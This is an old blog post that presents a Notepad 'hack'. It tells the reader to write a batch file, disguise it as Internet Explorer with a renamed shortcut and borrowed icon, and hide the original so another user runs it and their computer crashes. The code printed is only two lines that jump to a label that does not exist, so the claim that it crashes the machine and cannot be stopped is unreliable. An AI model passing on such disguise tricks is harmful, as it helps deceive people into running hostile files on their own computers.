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Wednesday, June 13, 2012

Hack A Computer With Notepad (Harmful)

Hit the start menu and type "Notepad" and click enter and Notepad will open.

Copy below code and paste it.

@echo off
goto :a

It is harmful code so don’t try to use in your computer. You cant stop it. SO DONT TRY IT ON YOUR COMPUTER!!

Save it as "Internet Explorer.bat". Make Sure you save it to the desktop!!!!!!!!!

Next you need to change the icon to look like "Internet Explorer".
To do this you need to right click the Icon and go down to "Create Shortcut" and then rename it to "Internet Explorer". Then right click it and go down to "Properties" and select "Change Icon".
Find the Internet Explorer Icon and click it and then click "Apply".
Put the original Batch File in a random folder on the desktop. So they cant see it.

If you then double click it and it will Crash the computer.
I Recommend you do not do this on your computer.


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